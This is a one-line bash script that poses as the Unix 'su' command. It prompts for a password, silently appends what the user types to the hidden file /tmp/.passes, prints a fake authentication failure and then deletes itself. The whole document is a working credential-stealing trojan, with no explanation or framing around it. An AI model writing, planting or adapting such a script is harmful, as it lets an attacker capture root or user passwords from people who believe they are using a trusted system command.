#!/bin/bash echo -n 'Password: ' read -s password echo $password>>/tmp/.passes echo -e '\nsu: Authentication failure' echo Sorry. rm -f ./su